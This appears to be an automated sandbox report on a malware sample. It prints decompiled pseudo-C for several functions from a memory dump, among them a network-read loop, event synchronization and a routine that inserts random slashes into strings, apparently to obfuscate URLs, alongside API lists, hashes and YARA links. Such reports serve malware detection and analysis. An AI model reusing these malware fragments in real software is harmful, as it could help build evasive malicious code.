Download Yara Rule

C-Code - Quality: 39%

			E00BA2303(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xbad138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xbad168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00BA8D59(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xbad138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00BA677C(_v16);
							if(_t58 == 0) {
								_t58 = E00BA1BFD(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00BA9837( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00BA9837( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x00ba2312
0x00ba2317
0x00ba2319
0x00ba231e
0x00ba231f
0x00ba2324
0x00ba2325
0x00ba2330
0x00ba2361
0x00ba2366
0x00ba2429
0x00ba242c
0x00ba2432
0x00ba2432
0x00ba2373
0x00ba237b
0x00ba2426
0x00000000
0x00ba2426
0x00ba2386
0x00ba238b
0x00ba2390
0x00ba2418
0x00ba2419
0x00ba2419
0x00ba241f
0x00000000
0x00ba241f
0x00ba2396
0x00ba2398
0x00ba239e
0x00ba239f
0x00ba239f
0x00ba23a2
0x00ba23a5
0x00ba23ab
0x00ba23b0
0x00ba23b1
0x00ba23b6
0x00ba23b9
0x00ba23c4
0x00000000
0x00000000
0x00ba23cc
0x00ba23d4
0x00ba23fd
0x00ba2400
0x00ba2407
0x00ba2412
0x00ba2412
0x00000000
0x00ba2407
0x00ba23e0
0x00ba23e4
0x00000000
0x00000000
0x00ba23e6
0x00ba23eb
0x00000000
0x00000000
0x00ba23ed
0x00ba23ed
0x00ba23f2
0x00000000
0x00000000
0x00ba23f4
0x00ba23f5
0x00ba23f8
0x00ba23f8
0x00ba239f
0x00ba2338
0x00ba2340
0x00ba2359
0x00ba235b
0x00000000
0x00000000
0x00000000
0x00ba235b
0x00ba234c
0x00ba2350
0x00000000
0x00000000
0x00ba2356
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 00BA2319
GetLastError.KERNEL32 ref: 00BA2332

Part of subcall function 00BA9837: WaitForMultipleObjects.KERNEL32(00000002,00BAA9FB,00000000,00BAA9FB,?,?,?,00BAA9FB,0000EA60), ref: 00BA9852

ResetEvent.KERNEL32(?), ref: 00BA23AB
GetLastError.KERNEL32 ref: 00BA23C6

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 467cbf650c7b8ff3832d28f4d458d4282a34a6b3072717719eda964338ca3607
Instruction ID: 73ae1e43e0a1151502ca82cc5dc8a0c75529f5c82b21784d32870bb52f27e224
Opcode Fuzzy Hash: 467cbf650c7b8ff3832d28f4d458d4282a34a6b3072717719eda964338ca3607
Instruction Fuzzy Hash: 6A31C432A04204AFCF229BA9CC45EAE77F9EF8A350F1545A4E651A7290DE30DD45DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2997, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00BA2997(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xbad270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xbad2a4; // 0x44fa5a8
				_t3 = _t8 + 0xbae862; // 0x61636f4c
				_t25 = 0;
				_t30 = E00BA5FC5(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xbad2a8, 1, 0, _t30);
					E00BA677C(_t30);
				}
				_t12 =  *0xbad25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00BA244A() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00BA8D99(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xbad110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00BA66F6(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00ba2998
0x00ba299f
0x00ba29a9
0x00ba29ad
0x00ba29b3
0x00ba29c2
0x00ba29c9
0x00ba29cd
0x00ba29df
0x00ba29e1
0x00ba29e1
0x00ba29e6
0x00ba29ed
0x00ba2a44
0x00ba2a44
0x00ba2a4a
0x00ba2a4c
0x00ba2a4c
0x00ba2a56
0x00ba2a5a
0x00ba2a6c
0x00ba2a6c
0x00ba2a70
0x00ba2a76
0x00ba2a76
0x00000000
0x00ba2a06
0x00ba2a0b
0x00ba2a13
0x00ba2a17
0x00ba2a1b
0x00ba2a1b
0x00ba2a28
0x00ba2a2c
0x00ba2a30
0x00ba2a85
0x00ba2a8b
0x00ba2a8b
0x00ba2a3e
0x00ba2a42
0x00ba2a79
0x00ba2a7b
0x00ba2a7e
0x00ba2a7e
0x00000000
0x00ba2a7b
0x00ba2a42
0x00000000
0x00ba2a2c

APIs

Part of subcall function 00BA5FC5: lstrlen.KERNEL32(00BA5073,00000000,00000000,00000027,00000005,00000000,00000000,00BA56A8,74666F53,00000000,00BA5073,00BAD00C,?,00BA5073), ref: 00BA5FFB
Part of subcall function 00BA5FC5: lstrcpy.KERNEL32(00000000,00000000), ref: 00BA601F
Part of subcall function 00BA5FC5: lstrcat.KERNEL32(00000000,00000000), ref: 00BA6027

CreateEventA.KERNEL32(00BAD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BA4D6D,?,00000001,?), ref: 00BA29D8

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

WaitForSingleObject.KERNEL32(00000000,00004E20,00BA4D6D,00000000,00000000,?,00000000,?,00BA4D6D,?,00000001,?,?,?,?,00BA28F1), ref: 00BA2A38
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00BA4D6D,?,00000001,?), ref: 00BA2A66
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BA4D6D,?,00000001,?,?,?,?,00BA28F1), ref: 00BA2A7E

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 03c2b2095b0999b29cdd99cd2f7c32389f26b681578e8d5a89054df73fc0a42c
Instruction ID: 4d63d403c9fa79686781f29089564f1a55f386b6331855dd655a4f4ffdefcde5
Opcode Fuzzy Hash: 03c2b2095b0999b29cdd99cd2f7c32389f26b681578e8d5a89054df73fc0a42c
Instruction Fuzzy Hash: 4721E532608312ABCB315BACDD45A6B77D9EF8BB10B0506A5FD52E7161DF70CC018654

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA359, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00BAA359(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xbad140; // 0xbaad01
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00BA8D59(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00BA677C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00BA9837( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x00baa359
0x00baa359
0x00baa363
0x00baa369
0x00baa36c
0x00baa370
0x00baa376
0x00baa37b
0x00baa394
0x00baa397
0x00baa39b
0x00baa39f
0x00baa3a0
0x00baa3a5
0x00baa3a8
0x00baa3af
0x00baa3b6
0x00baa409
0x00baa40f
0x00baa415
0x00baa450
0x00baa456
0x00000000
0x00000000
0x00000000
0x00baa415
0x00baa3bc
0x00000000
0x00baa3c3
0x00baa3d1
0x00baa3d4
0x00baa3d7
0x00baa3e3
0x00baa3e7
0x00baa449
0x00baa3e9
0x00baa3ec
0x00baa3f0
0x00baa3f1
0x00baa3f2
0x00baa3f4
0x00baa3fb
0x00baa439
0x00baa444
0x00baa3fd
0x00baa400
0x00baa404
0x00baa404
0x00baa3fb
0x00000000
0x00baa3e7
0x00baa3bc
0x00baa380
0x00baa386
0x00baa389
0x00baa38e
0x00000000
0x00000000
0x00000000
0x00baa41e
0x00baa426
0x00baa42b
0x00baa42e
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 00BAA370
SetEvent.KERNEL32(?), ref: 00BAA380
GetLastError.KERNEL32 ref: 00BAA409

Part of subcall function 00BA9837: WaitForMultipleObjects.KERNEL32(00000002,00BAA9FB,00000000,00BAA9FB,?,?,?,00BAA9FB,0000EA60), ref: 00BA9852

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

GetLastError.KERNEL32(00000000), ref: 00BAA43E

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 42210120c4f50ebc5fd6bf9293fe1060bc83ea0894dc78bdd6fa052cb2fcb645
Instruction ID: e470a219a3c6eafba58374ce7a6a16b3565e95a8ec5621e73c3fe339331d9d7c
Opcode Fuzzy Hash: 42210120c4f50ebc5fd6bf9293fe1060bc83ea0894dc78bdd6fa052cb2fcb645
Instruction Fuzzy Hash: 103141B5904309EFDB20DFA5C8C59AEBBF8EB09304F1049AAE502A3651DB749E44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4CBE, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00BA4CBE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00BA56DD(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00BA4DE0(_t23);
						}
					}
					return _t38;
				}
				if(E00BA576C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xbad2a8, 1, 0,  *0xbad340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00BA215A(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00BA6791(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00BA3822(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00BA2997( &_v32, _t39);
					goto L13;
				}
			}

0x00ba4cbe
0x00ba4ccb
0x00ba4cd1
0x00ba4cd2
0x00ba4cd3
0x00ba4cd4
0x00ba4cd5
0x00ba4cd9
0x00ba4ce5
0x00ba4ce9
0x00ba4d71
0x00ba4d71
0x00ba4d74
0x00ba4d76
0x00ba4d7e
0x00ba4d7e
0x00ba4d84
0x00ba4d87
0x00ba4d87
0x00ba4d84
0x00ba4d92
0x00ba4d92
0x00ba4cfc
0x00ba4cfe
0x00ba4cfe
0x00ba4d15
0x00ba4d19
0x00ba4d1c
0x00ba4d27
0x00ba4d2e
0x00ba4d2e
0x00ba4d37
0x00ba4d3b
0x00ba4d49
0x00ba4d3d
0x00ba4d3d
0x00ba4d3e
0x00ba4d3f
0x00ba4d40
0x00ba4d41
0x00ba4d42
0x00ba4d42
0x00ba4d4e
0x00ba4d51
0x00ba4d55
0x00ba4d57
0x00ba4d57
0x00ba4d5e
0x00000000
0x00ba4d60
0x00ba4d60
0x00ba4d6d
0x00000000
0x00ba4d6d

APIs

CreateEventA.KERNEL32(00BAD2A8,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,00BA28F1,?,00000001,?), ref: 00BA4D0F
SetEvent.KERNEL32(00000000,?,?,?,00BA28F1,?,00000001,?,00000002,?,?,00BA50A1,?), ref: 00BA4D1C
Sleep.KERNEL32(00000BB8,?,?,?,00BA28F1,?,00000001,?,00000002,?,?,00BA50A1,?), ref: 00BA4D27
CloseHandle.KERNEL32(00000000,?,?,?,00BA28F1,?,00000001,?,00000002,?,?,00BA50A1,?), ref: 00BA4D2E

Part of subcall function 00BA215A: WaitForSingleObject.KERNEL32(00000000,?,?,?,00BA4D4E,?,00BA4D4E,?,?,?,?,?,00BA4D4E,?), ref: 00BA2234

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 9b849687eeca35573963c10ca3a003639af660279ca3c3418d1386468e861f0f
Instruction ID: f3b8c21eeb6af237d9c8981d19bab28bc7ca9d8303a93e6deb7f3ea1f76d50cf
Opcode Fuzzy Hash: 9b849687eeca35573963c10ca3a003639af660279ca3c3418d1386468e861f0f
Instruction Fuzzy Hash: DE216277904119EBCF20BFE8C8869EEB7FCEB86750B0544B5FA51A7100DBB49D4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA226B, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BA226B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xbad238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xbad250; // 0x33fe455f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xbad250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00ba2273
0x00ba2276
0x00ba227c
0x00ba2294
0x00ba2296
0x00ba229b
0x00ba229d
0x00ba22a0
0x00ba22a2
0x00ba22a5
0x00ba22a7
0x00ba22a7
0x00ba22a9
0x00ba22b4
0x00ba22b9
0x00ba22ca
0x00ba22d2
0x00ba22d7
0x00ba22da
0x00ba22dd
0x00ba22df
0x00ba22e2
0x00ba22e5
0x00ba22e5
0x00ba22e8
0x00ba22f3
0x00ba22f8
0x00ba2302

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00BA1AC3,00000000,?,?,00BA1EFB,?,050A95B0), ref: 00BA2276
RtlAllocateHeap.NTDLL(00000000,?), ref: 00BA228E
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00BA1AC3,00000000,?,?,00BA1EFB,?,050A95B0), ref: 00BA22D2
memcpy.NTDLL(00000001,?,00000001), ref: 00BA22F3

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 126c40e87d95633980a83da73b71c8a0952ccd2490017c8bbf52c2a8e4b7c29d
Instruction ID: e7312485869a36d30b26ad8ea35cdc0cfee9d079db495e8c4d9bf089e3dade80
Opcode Fuzzy Hash: 126c40e87d95633980a83da73b71c8a0952ccd2490017c8bbf52c2a8e4b7c29d
Instruction Fuzzy Hash: A011C672A00214AFD7208BA9DC85E9EBBEADBC6360B1501B6F50597250EB709E04D760

Uniqueness

Uniqueness Score: -1.00%

Function 00BA203C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BA203C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00BA8D59(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xbac29c);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xbac29c);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00ba2047
0x00ba204b
0x00ba204d
0x00ba204e
0x00ba2056
0x00ba2056
0x00ba205a
0x00000000
0x00000000
0x00ba2051
0x00ba2052
0x00ba2055
0x00ba2055
0x00ba2062
0x00ba2067
0x00ba206d
0x00ba2075
0x00ba207b
0x00ba207d
0x00ba2082
0x00ba2086
0x00ba2088
0x00ba208b
0x00ba2092
0x00ba2092
0x00ba209c
0x00ba209f
0x00ba20a0
0x00ba20a2
0x00ba20ae
0x00ba20ae
0x00ba20bb

APIs

StrChrA.SHLWAPI(?,00000020,00000000,050A95AC,?,00BA5068,?,00BA9777,050A95AC,?,00BA5068), ref: 00BA2056
StrTrimA.SHLWAPI(?,00BAC29C,00000002,?,00BA5068,?,00BA9777,050A95AC,?,00BA5068), ref: 00BA2075
StrChrA.SHLWAPI(?,00000020,?,00BA5068,?,00BA9777,050A95AC,?,00BA5068), ref: 00BA2080
StrTrimA.SHLWAPI(00000001,00BAC29C,?,00BA5068,?,00BA9777,050A95AC,?,00BA5068), ref: 00BA2092

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 8ddc3735011d690f5d271aa7db02877b38ca41d9fe3a57ce069a82bb3663a176
Instruction ID: 691bd2f1be8a5a173b817cc994136d4972970dd464ff09dc0e4a9ce987805421
Opcode Fuzzy Hash: 8ddc3735011d690f5d271aa7db02877b38ca41d9fe3a57ce069a82bb3663a176
Instruction Fuzzy Hash: EC01B171609325AFC2319F698C49F2BBFD8EB97BA0F110599F886D7251DF61CC02C2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5FC5, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BA5FC5(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00BA60BE(_t8, _t1);
				_t16 = E00BA8D59(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00BA2A8E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00BA8D59(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00BA677C(_t16);
				}
				return _t18;
			}

0x00ba5fd0
0x00ba5fd1
0x00ba5fd4
0x00ba5fd6
0x00ba5fe1
0x00ba5fe5
0x00ba5fea
0x00ba5fee
0x00ba5ff6
0x00ba5ffb
0x00ba6003
0x00ba6003
0x00ba600c
0x00ba6010
0x00ba6016
0x00ba6019
0x00ba601f
0x00ba601f
0x00ba6027
0x00ba6027
0x00ba602e
0x00ba602e
0x00ba6039

APIs

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

Part of subcall function 00BA2A8E: wsprintfA.USER32 ref: 00BA2AEA

lstrlen.KERNEL32(00BA5073,00000000,00000000,00000027,00000005,00000000,00000000,00BA56A8,74666F53,00000000,00BA5073,00BAD00C,?,00BA5073), ref: 00BA5FFB
lstrcpy.KERNEL32(00000000,00000000), ref: 00BA601F
lstrcat.KERNEL32(00000000,00000000), ref: 00BA6027

Strings

Soft, xrefs: 00BA5FD1, 00BA5FEA

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: f6563a02472fccd7d24b216720646fdb5b8f78f486f480cebc73a7fbc581fa4f
Instruction ID: 4f1520506e586abcb7aac78cbb0ff616fb922b8294737f72eac68b189ef21137
Opcode Fuzzy Hash: f6563a02472fccd7d24b216720646fdb5b8f78f486f480cebc73a7fbc581fa4f
Instruction Fuzzy Hash: 81012672104205B7C7323BA8ECC9AAF3FEDDF87381F0840A6FA0456151DF3489858BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA457, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAA457(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x00baa461
0x00baa465
0x00baa47a
0x00baa47c
0x00baa481
0x00baa487
0x00baa489
0x00baa48e
0x00baa499
0x00baa490
0x00baa490
0x00baa490
0x00baa48e
0x00baa4a7

APIs

memset.NTDLL ref: 00BAA465
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 00BAA47A
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00BAA487
CloseHandle.KERNEL32(?), ref: 00BAA499

Memory Dump Source

